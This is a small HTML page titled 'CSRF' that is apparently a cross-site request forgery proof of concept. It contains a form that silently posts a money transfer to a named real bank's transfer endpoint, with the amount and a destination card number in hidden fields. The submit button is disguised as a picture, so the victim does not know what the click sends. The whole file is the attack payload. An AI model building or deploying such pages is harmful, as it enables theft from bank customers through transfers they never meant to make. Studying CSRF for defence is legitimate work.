<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>CSRF</title>
</head>
<body>

<form action="https://kapitalbank.uz/transfer-money" method="post">
    <input name="formId" value="65656545">
    <input name="amount" value="200000" style="display: none">
    <input name="toCardNumber" value="8600112233449900" style="display: none">
    <button type="submit"><img src="../static/images/fakePic.jpeg"></button>
</form>

</body>
</html>